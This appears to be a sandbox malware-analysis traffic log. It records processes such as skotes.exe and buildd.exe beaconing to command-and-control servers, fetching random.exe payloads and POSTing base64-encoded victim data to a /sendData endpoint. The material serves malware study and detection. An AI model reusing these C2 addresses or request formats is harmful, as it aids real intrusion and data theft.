Nov 7, 2024 04:13:13.775712013 CET	636	IN	Data Raw: 00 00 06 13 08 11 08 39 d8 00 00 00 00 12 07 28 3a 00 00 0a 18 5f 16 fe 03 13 09 11 09 2c 12 00 04 50 11 05 17 6f 3b 00 00 0a 00 00 38 b1 00 00 00 00 d0 0d 00 00 02 28 22 00 00 0a 28 23 00 00 0a 28 3c 00 00 0a 13 0a 17 73 2b 00 00 06 13 0b 14 11 Data Ascii: 9(:_,Po;8("(#(<s+{K\|0(,i{K}1(+P("(#~'(o;PPo&,()+o;(>+(?:
Nov 7, 2024 04:13:13.775778055 CET	1236	IN	Data Raw: 0a 00 12 0c 28 40 00 00 0a 2d 91 de 0f 12 0c fe 16 06 00 00 1b 6f 32 00 00 0a 00 dc 11 0b 13 12 11 12 2c 15 00 05 11 04 6f 42 00 00 0a 54 0e 04 11 04 6f 44 00 00 0a 51 00 00 00 05 4a 15 fe 01 13 13 11 13 2c 11 00 07 28 1f 00 00 06 26 7e 27 00 00 Data Ascii: (@-o2,oBToDQJ,(&~'++Xi?+-s0o(<(,L(o+( ,*(E,+,
Nov 7, 2024 04:13:13.775831938 CET	1236	IN	Data Raw: 7d 2b 00 00 04 12 00 02 1f 20 63 69 7d 2c 00 00 04 06 0b 2b 00 07 2a 13 30 02 00 18 00 00 00 0b 00 00 11 00 02 7b 2f 00 00 04 6a 1f 20 62 02 7b 2e 00 00 04 6e 60 0a 2b 00 06 2a 13 30 03 00 24 00 00 00 0d 00 00 11 00 12 00 fe 15 08 00 00 02 12 00 Data Ascii: }+ ci},+0{/j b{.n`+0$i}. ci}/+*03 (_4 [38J8&_9 da8dX:~3X~3
Nov 7, 2024 04:13:13.775849104 CET	424	IN	Data Raw: 03 11 0c 06 11 0c 28 57 00 00 0a 28 6e 00 00 0a 72 e5 01 00 70 28 31 00 00 06 26 11 0b 17 58 13 0b 11 0b 11 0a 8e 69 3f cc ff ff ff 04 28 71 00 00 0a 13 04 00 11 04 13 0d 16 13 0e 38 1d 00 00 00 11 0d 11 0e 9a 13 0f 02 03 11 0f 06 72 e5 01 00 70 Data Ascii: (W(nrp(1&Xi?(q8rp(4Xi?0&{09{,ofm{.9{,{.{.ior8;{,of{os(>{
Nov 7, 2024 04:13:13.775872946 CET	1236	IN	Data Raw: 00 00 11 00 02 7b 2e 01 00 04 14 fe 01 0b 07 39 10 00 00 00 72 e7 01 00 70 28 01 00 00 06 73 63 00 00 0a 7a 73 76 00 00 0a 0a 16 0c 38 10 02 00 00 00 02 7b 2e 01 00 04 08 28 77 00 00 0a 0d 09 20 50 4b 01 02 fe 01 16 fe 01 13 12 11 12 39 05 00 00 Data Ascii: {.9rp(sczsv8{.(w PK98{.X(x _{.X(x{.X(w{.X(w{.X(wn{.X(wn{.X(x{.X(x{.
Nov 7, 2024 04:13:13.775886059 CET	212	IN	Data Raw: 6f 32 00 00 0a 00 dc 08 2a 00 00 01 10 00 00 02 00 07 00 2b 32 00 0e 00 00 00 00 1b 30 05 00 5d 01 00 00 1c 00 00 11 00 02 50 7b 2c 01 00 04 75 5c 00 00 01 14 fe 03 16 fe 01 0d 09 39 10 00 00 00 72 83 02 00 70 28 01 00 00 06 73 63 00 00 0a 7a 02 Data Ascii: o2*+20]P{,u\9rp(sczPo6((~!(-o8T(o95Po79 {8{9{Co1&
Nov 7, 2024 04:13:13.775899887 CET	1236	IN	Data Raw: 00 12 05 28 8f 00 00 0a 3a a0 ff ff ff dd 0f 00 00 00 12 05 fe 16 0b 00 00 1b 6f 32 00 00 0a 00 dc 02 50 6f 35 00 00 06 00 11 04 6f 35 00 00 06 00 02 50 7b 2b 01 00 04 28 90 00 00 0a 00 07 02 50 7b 2b 01 00 04 28 91 00 00 0a 00 02 02 50 7b 2b 01 Data Ascii: (:o2Po5o5P{+(P{+(P{+P{0(/Q&</(9((9(8*(Uj>>#/0[d{,
Nov 7, 2024 04:13:13.780534029 CET	1236	IN	Data Raw: 00 04 6f 97 00 00 0a 0a 02 7b 2c 01 00 04 06 6f 98 00 00 0a 00 02 7b 2c 01 00 04 1a 8d 64 00 00 01 25 d0 09 02 00 04 28 94 00 00 0a 16 1a 6f 72 00 00 0a 00 02 7b 2c 01 00 04 1f 2c 6a 28 99 00 00 0a 16 1e 6f 72 00 00 0a 00 02 7b 2c 01 00 04 1f 2d Data Ascii: o{,o{,d%(or{,,j(or{,-(or{,-(or{,(or{,(or{,{otj{/X(or{,{otj{/X(or{,(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49869	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:17.535119057 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004506001&unit=246122658369
Nov 7, 2024 04:13:18.478790998 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49875	208.95.112.1	80	8080	C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:17.781871080 CET	85	OUT	GET /line?fields=query,country HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 7, 2024 04:13:18.385174036 CET	199	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:17 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 29 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0a Data Ascii: United States173.254.250.79

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49880	185.215.113.16	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:18.488616943 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 7, 2024 04:13:19.391340971 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:19 GMT Content-Type: application/octet-stream Content-Length: 3155968 Last-Modified: Thu, 07 Nov 2024 02:48:53 GMT Connection: keep-alive ETag: "672c2a95-302800" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 30 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 a3 39 30 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ00@`090@Th@ @.rsrc@@.idata @xdlmaljhpl@lyfosorw 00@.taggant000"0@
Nov 7, 2024 04:13:19.391350985 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:19.391649008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:19.391659975 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:19.391675949 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:19.391685963 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 9=6( <VS,b7R!xx->VSiU'''nI_8/[.}/LZ/4=Em%mi+IXyLc9URxVzCWSi
Nov 7, 2024 04:13:19.391702890 CET	1236	IN	Data Raw: 71 3f 56 53 ae 82 8b 64 7a 9e eb 5c e9 34 e9 a8 60 01 eb 78 41 3e f6 98 68 00 eb 78 51 3e 5c 98 4c 46 ae a8 7e be 51 9e 79 d3 17 ba a1 82 8b 94 6a 6e 16 3c 6f 4a e8 c4 2c 62 90 1b 2c 62 b6 dc 6b 3e 56 14 6b 3e 56 53 80 98 a9 5c 69 f8 ba bc 2c 3e Data Ascii: q?VSdz\4`xA>hxQ>\LF~Qyjn<oJ,b,bk>Vk>VS\i,>V!h\x>!@MP]h\i>)UiSg>VSCpL@DXlJ,b$ObVS$bh>V$bxUjI(k>V$b$b'xm^n@V
Nov 7, 2024 04:13:19.391716003 CET	424	IN	Data Raw: 6c 4e 56 53 ec fe a6 d8 36 4e 56 53 e9 78 56 42 ed c9 b6 5c 69 cb f8 5f e2 82 8b 58 ea fe 54 c5 be 30 69 5f 66 c2 75 43 69 3e 2b 1c 79 c2 9f 4c 69 3e d6 92 68 49 2a a5 49 3e 56 c0 2b 42 21 a8 4c 42 29 1a 94 e6 aa 43 ed ff a6 5c 69 c3 5d 43 ed 4f Data Ascii: lNVS6NVSxVB\i_XT0i_fuCi>+yLi>hII>V+B!LB)C\i]CO\i'Li>.L\ixI?VSixQ>lLjV,b\i>V,b\i>Vb^i>/LVmLFVSi>[nL~VSi>OCx>V$bC?)lxM+x2<VS\|h>VShxE>mLrVSi>mLJVSi>#L\i'Ei>!Lbs\
Nov 7, 2024 04:13:19.391726971 CET	1236	IN	Data Raw: 0e 01 eb 5d 68 6e de dc a2 3c 2e 88 4c 76 2f 2d ab 27 b3 c7 2c 62 aa 43 df 4a ae c4 e4 62 32 5c 69 3e 21 88 4c 4a 2b 0e 79 c2 3f 5c 69 3e a5 ea 67 3e 26 98 68 c6 23 78 f4 3e 56 53 e4 c2 8b f2 68 3e 56 c4 2c 62 ba c5 bb bd 51 41 1b 43 1f 41 69 3e Data Ascii: ]hn<.Lv/-',bCJb2\i>!LJ+y?\i>g>&h#x>VSh>V,bQACAi>Vgn,b`xy>VSio=>VSt7B'''GV)<yxmIXhIl+p>VSBBqb4\i>Wt@ @$LWSix}o\lb/LBO&h>VxMF/L^!Lr)U
Nov 7, 2024 04:13:19.391750097 CET	212	IN	Data Raw: 79 65 da 78 65 80 20 b0 4c 72 6d 98 4c 4a 57 53 69 3d 4f 40 62 3e 56 94 aa ba a9 c5 aa 67 60 c5 be 27 02 5f 69 3e 2f 80 4c 4a 21 88 4c 46 41 62 e0 92 8b 4c e0 9a 8b 78 e2 92 8b 44 82 5a 2f 80 4c 4a 21 88 4c 46 21 68 4d 25 ba c5 24 62 a6 c5 34 62 Data Ascii: yexe LrmLJWSi=O@b>Vg`'_i>/LJ!LFAbLxDZ/LJ!LF!hM%$b4b<b\b/LJ/LF]h?VSf]i>o?&hr:,bh<VSX'xAxeP\3<b\a\>w)o&h>/LN/6W<CBM'xy>VSiamx
Nov 7, 2024 04:13:19.396627903 CET	1236	IN	Data Raw: 3d 3f 46 c5 2c 62 aa 2a 2c 62 ae 9c e3 8a 8b 40 1c 79 26 cc f8 ce 27 cc f8 ce 27 cc f8 ce 27 cc f8 c7 78 c5 b8 f4 b6 d9 85 8f 5e 3e ab 24 ac a7 aa a2 20 07 43 fd a6 eb ec 55 8e bc 2c 3e cc c5 2c 72 f0 df ae 38 2a 55 0c ad 7d c7 3c 62 8e 27 18 c7 Data Ascii: =?F,b,b@y&'''x^>$ CU,>,r8U}<b'zxA$b'Fxmxd^>$lL#Xgin.\a$b,bVm$b,b,r#oxs'x'''xmxeExy%>VS'''\|l\By

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49882	147.124.221.201	8080	8080	C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:18.801428080 CET	253	OUT	POST /sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=NzYwNjM5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1 Host: 147.124.221.201:8080 Content-Length: 145961 Expect: 100-continue Connection: Keep-Alive
Nov 7, 2024 04:13:19.391125917 CET	25	IN	HTTP/1.1 100 Continue
Nov 7, 2024 04:13:19.803849936 CET	162	IN	HTTP/1.1 200 OK Content-Length: 36 Content-Type: application/json Date: Thu, 07 Nov 2024 03:13:19 GMT Server: waitress Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 53 75 63 63 65 73 73 22 2c 22 73 74 61 74 75 73 22 3a 74 72 75 65 7d 0a Data Ascii: {"message":"Success","status":true}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49905	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:23.241730928 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004516001&unit=246122658369
Nov 7, 2024 04:13:24.146497965 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49912	185.215.113.16	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:24.153451920 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 7, 2024 04:13:25.049434900 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:24 GMT Content-Type: application/octet-stream Content-Length: 2163712 Last-Modified: Thu, 07 Nov 2024 02:49:06 GMT Connection: keep-alive ETag: "672c2aa2-210400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 80 73 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 73 00 00 04 00 00 66 c3 21 00 02 00 40 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b}...u^..uk..u_..{v..fz/.{f....uZ..uh..Rich.PEL8ng,s@sf!@P.d. p.v@.rsrc .@.idata .@ p*.@rswsxqeb`YR@ekqrsvgtps @.taggant0s" @
Nov 7, 2024 04:13:25.049474955 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:25.049491882 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:25.049505949 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 7, 2024 04:13:25.049516916 CET	448	IN	Data Raw: 5e 32 51 bd a5 96 e8 2e a6 5e 26 6d 5c 36 f4 ce cb 4f 78 98 5b 0b 08 a1 a8 10 c3 86 1c 47 66 e5 e6 31 9e fc 00 78 43 21 3b c0 c3 cd e6 37 bf 48 13 18 b0 99 6c 48 9d be ab d1 e7 86 bd 38 1d 69 a5 ac b6 53 44 35 2a dd 21 5d e2 d6 6d 42 6d 55 5e 6d Data Ascii: ^2Q.^&m\6Ox[Gf1xC!;7HlH8iSD5*!]mBmU^ml[0]W^AQ&-y- !;<Zy8[VIjTn,z;Aq32?.7mM4niyFM9mZ0x)BTeUk;{c
Nov 7, 2024 04:13:25.049535036 CET	1236	IN	Data Raw: a4 0d 48 85 82 c4 e3 9a b6 59 8b 51 fb ab 5d 58 51 d0 fe 5c b0 34 3a 39 e9 4a 68 97 fd 70 6d c0 34 2d 69 06 e8 af 9a bd 3e b0 76 5d db 2f f3 31 0a c6 9a 27 fd 51 af cf 0e 41 3f 0e 26 3d 9c 25 cb 11 b0 cf cd 4d f5 6c 0e 55 18 03 c1 f8 1f 95 f6 b0 Data Ascii: HYQ]XQ\4:9Jhpm4-i>v]/1'QA?&=%MlUd8>S<LeGr)/oz^>AhMS qSEOcx5/6@)g#Nywr*uwqZ(GA7Vo91H,\|\'6)>~
Nov 7, 2024 04:13:25.049551010 CET	1236	IN	Data Raw: d0 38 52 39 53 f8 2c b0 39 ec c9 95 fb b4 59 6f 28 00 af 2e aa db ed 2f 01 d5 7c 9f 57 c3 60 6f dc 38 f6 ac 6f 33 7c 9d 9e d2 6f 27 36 95 6f 57 52 a2 76 b2 a5 b1 df 79 a6 15 df cc 75 da 2d 87 f3 0d 5e bf 82 af 15 54 a6 6b 9f 9b 45 ff 50 a9 fa 42 Data Ascii: 8R9S,9Yo(./\|W`o8o3\|o'6oWRvyu-^TkEPBQ?]Oc^ Z>B.Xd'sWC-V*M^3yQMVm^\[zyR5ahCtDnAPUO:x\|IV<n9
Nov 7, 2024 04:13:25.049570084 CET	1236	IN	Data Raw: db 49 58 96 59 91 a3 d5 07 55 bf 95 c0 35 d2 22 f7 d5 3b cd 5c 4d 67 6f 14 4e 8b 26 59 17 e7 7d 28 f2 66 e5 fc 09 8e cd 27 11 d0 a4 44 b1 98 70 02 b1 89 a0 f6 75 3e d1 a7 57 21 49 fc 70 0f a5 9f a9 9b 9e 07 c1 73 5e c6 35 39 a0 a4 d9 9b f5 9f 0f Data Ascii: IXYU5";\MgoN&Y}(f'Dpu>W!Ips^59uOiopeo=jo!>BuFW===xC^nufl}1=Dd<U18lNU0BD8<d6MgfyED`J8)8DcHpUM'
Nov 7, 2024 04:13:25.049581051 CET	1236	IN	Data Raw: 98 ef 7b 94 f6 04 5c 96 f0 4f db b5 78 35 5e 1d a6 ac 66 81 af 83 46 49 b1 0a f0 cb 37 44 30 a5 e5 bb 3d f5 0d f5 59 1d d8 62 46 e9 be d3 66 7e 14 d4 82 6d f6 44 98 9e d7 49 14 29 71 11 b0 69 e0 4f 58 b6 34 f5 66 8d 3c 98 57 04 fb 3b 37 99 ed 3d Data Ascii: {\Ox5^fFI7D0=YbFf~mDI)qiOX4f<W;7=%)uf!=DT@xDDGDIoLel{s!Ef}oY0;R=)8E?%Dp0(4n}S;7DNwUSfoN
Nov 7, 2024 04:13:25.049587965 CET	1236	IN	Data Raw: f1 04 1e cf fb 4f 80 6b e5 29 67 7f f5 16 6f e5 fa 3c 50 6c d5 0e d8 b8 14 0f e8 6b d2 35 98 1e ef 81 a2 6a 9f 70 97 9f 60 3c 4f 92 76 b3 4d 55 c8 ff 96 44 0c b4 67 91 0c ee 70 c5 1c 28 8b 01 31 aa 5c 21 e0 75 f7 26 ed 28 63 31 17 fe f9 95 a8 bd Data Ascii: Ok)go<Plk5jp`<OvMUDgp(1\!u&(c1t(c!=p.LD5@(<gf^<LfYtDp0`CigI?AooM}Kd?02p\,qwyvt>*VFU=%X=1gM\|nH[h
Nov 7, 2024 04:13:25.054486036 CET	1236	IN	Data Raw: f1 ff ef 3a 81 b6 9a f9 80 df b4 1a d7 15 ec 1c 8d b0 df 40 42 bd 94 5b cc e5 7a 9f 9d 5f b3 2c a9 1d a1 d9 a9 84 a5 3d 6e 21 ed 97 c6 69 83 c5 d9 b5 0b 54 fc 21 3e 66 d6 15 e4 42 f2 9d bd 09 46 55 24 bf 10 3c 3f 99 bc c5 0f 81 df d1 a3 a7 d7 e6 Data Ascii: :@B[z_,=n!iT!>fBFU$<?OpTKzm&7v=jB^^nK5+e)FeXt<d7TV\^nO1Ak'R@Ao[ILQ1nw\|Jp(XAq!6pL\|5V]T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49943	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:28.955914974 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 34 35 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004517001&unit=246122658369
Nov 7, 2024 04:13:29.847625017 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49951	185.215.113.16	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:30.032046080 CET	140	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Thu, 07 Nov 2024 02:49:06 GMT If-None-Match: "672c2aa2-210400"
Nov 7, 2024 04:13:30.928402901 CET	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:30 GMT Last-Modified: Thu, 07 Nov 2024 02:49:06 GMT Connection: keep-alive ETag: "672c2aa2-210400"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49964	185.215.113.206	80	3904	C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:31.966487885 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 04:13:32.874859095 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:13:32.877345085 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------IEHDBGDHDAECBGDHJKFIContent-Disposition: form-data; name="build"tale------IEHDBGDHDAECBGDHJKFI--
Nov 7, 2024 04:13:33.163981915 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49973	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
